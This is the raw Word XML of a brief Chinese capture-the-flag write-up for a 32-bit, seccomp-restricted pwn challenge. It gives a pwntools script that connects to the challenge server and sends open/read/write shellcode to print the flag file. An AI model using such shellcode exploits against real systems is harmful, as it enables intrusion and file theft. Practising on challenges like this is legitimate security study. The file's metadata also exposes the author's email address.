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C09B" w14:textId="60815132" w:rsidR="00E73591" w:rsidRDefault="005D0D9F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1．32位文件，先看代码</w:t>
      </w:r>
      <w:r w:rsidRPr="005D0D9F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5213B73F" wp14:editId="348C958A">
            <wp:extent cx="5274310" cy="2270125"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="318005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05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D9F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C14C839" wp14:editId="2E212FC8">
            <wp:extent cx="5274310" cy="1327785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1644815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15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C121" w14:textId="5FAA726E" w:rsidR="005D0D9F" w:rsidRDefault="005D0D9F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一开始我以为就是一个在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>段的写入，但是seccomp很可能过滤掉了/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D0D9F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28F4DED2" wp14:editId="0482450F">
            <wp:extent cx="5274310" cy="3528695"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="430069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69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D263" w14:textId="4BB98A2E" w:rsidR="005D0D9F" w:rsidRDefault="009C5687">
      <w:r w:rsidRPr="009C5687">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27F6E832" wp14:editId="6F660C12">
            <wp:extent cx="5274310" cy="2974340"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="977498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98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6C06" w14:textId="66799843" w:rsidR="009C5687" w:rsidRDefault="009C5687">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF14314" w14:textId="77777777" w:rsidR="00DD280C" w:rsidRPr="00DD280C" w:rsidRDefault="00DD280C" w:rsidP="00DD280C">
      <w:r w:rsidRPr="00DD280C">
        <w:t>from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA749E2" w14:textId="77777777" w:rsidR="00DD280C" w:rsidRPr="00DD280C" w:rsidRDefault="00DD280C" w:rsidP="00DD280C"/>
    <w:p w14:paraId="2BCA20FE" w14:textId="77777777" w:rsidR="00DD280C" w:rsidRPr="00DD280C" w:rsidRDefault="00DD280C" w:rsidP="00DD280C">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t>context.arch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t xml:space="preserve"> = 'i386'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04608B77" w14:textId="77777777" w:rsidR="00DD280C" w:rsidRPr="00DD280C" w:rsidRDefault="00DD280C" w:rsidP="00DD280C">
      <w:r w:rsidRPr="00DD280C">
        <w:t xml:space="preserve">p = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t>remote(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t>'node3.buuoj.cn', 28626)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D309E2" w14:textId="77777777" w:rsidR="00DD280C" w:rsidRPr="00DD280C" w:rsidRDefault="00DD280C" w:rsidP="00DD280C"/>
    <w:p w14:paraId="692ED8AC" w14:textId="77777777" w:rsidR="00DD280C" w:rsidRPr="00DD280C" w:rsidRDefault="00DD280C" w:rsidP="00DD280C">
      <w:r w:rsidRPr="00DD280C">
        <w:t xml:space="preserve">shellcode = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t>shellcraft.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t>('/flag')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453B39D1" w14:textId="77777777" w:rsidR="00DD280C" w:rsidRPr="00DD280C" w:rsidRDefault="00DD280C" w:rsidP="00DD280C">
      <w:r w:rsidRPr="00DD280C">
        <w:t xml:space="preserve">shellcode += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t>shellcraft.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t>', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t>', 100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C25E005" w14:textId="77777777" w:rsidR="00DD280C" w:rsidRPr="00DD280C" w:rsidRDefault="00DD280C" w:rsidP="00DD280C">
      <w:r w:rsidRPr="00DD280C">
        <w:t xml:space="preserve">shellcode += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t>shellcraft.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t>(1, '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t>', 100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240FD22C" w14:textId="77777777" w:rsidR="00DD280C" w:rsidRPr="00DD280C" w:rsidRDefault="00DD280C" w:rsidP="00DD280C"/>
    <w:p w14:paraId="0DFE97DC" w14:textId="77777777" w:rsidR="00DD280C" w:rsidRPr="00DD280C" w:rsidRDefault="00DD280C" w:rsidP="00DD280C">
      <w:r w:rsidRPr="00DD280C">
        <w:t xml:space="preserve">payload = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t>asm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t>(shellcode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B149D66" w14:textId="77777777" w:rsidR="00DD280C" w:rsidRPr="00DD280C" w:rsidRDefault="00DD280C" w:rsidP="00DD280C">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t>p.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t>(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E74106" w14:textId="77777777" w:rsidR="00DD280C" w:rsidRPr="00DD280C" w:rsidRDefault="00DD280C" w:rsidP="00DD280C">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t>p.interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DD280C">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122D37EA" w14:textId="77777777" w:rsidR="00DD280C" w:rsidRPr="00DD280C" w:rsidRDefault="00DD280C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00DD280C" w:rsidRPr="00DD28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94F6D" w14:textId="77777777" w:rsidR="009B28F9" w:rsidRDefault="009B28F9" w:rsidP="005D0D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1CEB4F" w14:textId="77777777" w:rsidR="009B28F9" w:rsidRDefault="009B28F9" w:rsidP="005D0D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F248A" w14:textId="77777777" w:rsidR="009B28F9" w:rsidRDefault="009B28F9" w:rsidP="005D0D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1B4590" w14:textId="77777777" w:rsidR="009B28F9" w:rsidRDefault="009B28F9" w:rsidP="005D0D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91"/>
    <w:rsid w:val="00472D91"/>
    <w:rsid w:val="005D0D9F"/>
    <w:rsid w:val="009B28F9"/>
    <w:rsid w:val="009C5687"/>
    <w:rsid w:val="00DD280C"/>
    <w:rsid w:val="00E7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5D076"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5AEB0E84-A23B-4705-9B4E-70B8CA97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5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5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5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5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59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5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5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5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35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3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3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5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59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35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35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35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35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35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5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5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5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5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5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5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35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0D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0D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0D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0D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1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471826169@qq.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>471826169@qq.com</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-13T13:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-13T13:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>